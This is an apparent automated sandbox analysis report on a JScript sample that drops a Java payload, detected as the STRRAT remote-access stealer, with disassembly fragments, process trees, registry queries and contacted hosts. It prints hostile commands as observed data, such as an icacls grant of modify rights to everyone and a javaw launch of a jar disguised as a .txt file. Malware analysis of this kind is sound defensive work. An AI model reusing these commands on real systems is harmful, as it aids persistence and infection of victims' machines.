Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B6D830 push F8026836h; retf 2_2_02B6D842
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B6D631 push F8026836h; retf 2_2_02B6D642
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B6FC3D push F8026839h; retf 2_2_02B6FC42
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B6D527 push F8026836h; retf 2_2_02B6D542
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B6D72C push F8026836h; retf 2_2_02B6D742
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B6EC67 push F8026836h; retf 2_2_02B6EC82
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B6ED67 push F8026836h; retf 2_2_02B6ED82
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B6EE6C push F8026836h; retf 2_2_02B6EE82
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02ADD8F7 push 00000000h; mov dword ptr [esp], esp 2_2_02ADD921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02ADA20A push ecx; ret 2_2_02ADA21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02ADA21B push ecx; ret 2_2_02ADA225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02ADB3B7 push 00000000h; mov dword ptr [esp], esp 2_2_02ADB3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02ADBB67 push 00000000h; mov dword ptr [esp], esp 2_2_02ADBB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02ADD8E0 push 00000000h; mov dword ptr [esp], esp 2_2_02ADD921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02ADB947 push 00000000h; mov dword ptr [esp], esp 2_2_02ADB96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02ADC477 push 00000000h; mov dword ptr [esp], esp 2_2_02ADC49D
Uses cacls to modify the permissions of files
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: javaw.exe, 00000002.00000003.2174179696.000000001506F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: wscript.exe, 00000000.00000003.2159978751.0000021CF8956000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: javaw.exe, 00000002.00000003.2174179696.000000001506F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000002.00000002.3429336455.00000000011C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: javaw.exe, 00000002.00000003.2174179696.000000001506F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000002.00000002.3429336455.00000000011C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000002.00000003.2174179696.000000001506F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: java/lang/VirtualMachineError.classPK
Source: javaw.exe, 00000002.00000002.3429336455.00000000011C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02AE63B4 LdrInitializeThunk, 2_2_02AE63B4
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Memory protected: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\lugnisxncf.txt" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02AD03C0 cpuid 2_2_02AD03C0
Queries the installed Java version
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\4524 VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\3608lock.file VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected STRRAT
Source: Yara match File source: 00000002.00000002.3431081605.000000000A169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 4524, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected STRRAT
Source: Yara match File source: 00000002.00000002.3431081605.000000000A169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 4524, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540037 Sample: LYDI9MoZyu.js Startdate: 23/10/2024 Architecture: WINDOWS Score: 96 22 repo1.maven.org 2->22 24 github.com 2->24 26 2 other IPs or domains 2->26 32 Found malware configuration 2->32 34 Malicious sample detected (through community Yara rule) 2->34 36 Multi AV Scanner detection for submitted file 2->36 38 4 other signatures 2->38 9 wscript.exe 1 2 2->9         started        signatures3 process4 file5 20 C:\Users\user\AppData\...\lugnisxncf.txt, Zip 9->20 dropped 40 JScript performs obfuscated calls to suspicious functions 9->40 42 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->42 13 javaw.exe 23 9->13         started        signatures6 process7 dnsIp8 28 github.com 140.82.121.3, 443, 49716, 49762 GITHUBUS United States 13->28 30 dualstack.sonatype.map.fastly.net 199.232.196.209, 443, 49715, 49717 FASTLYUS United States 13->30 16 icacls.exe 1 13->16         started        process9 process10 18 conhost.exe 16->18         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
140.82.121.3
 github.com United States
36459 GITHUBUS false
199.232.196.209
 dualstack.sonatype.map.fastly.net United States
54113 FASTLYUS false

Contacted Domains

Name IP Active
github.com 140.82.121.3 true
dualstack.sonatype.map.fastly.net 199.232.196.209 true
15.164.165.52.in-addr.arpa unknown unknown
repo1.maven.org unknown unknown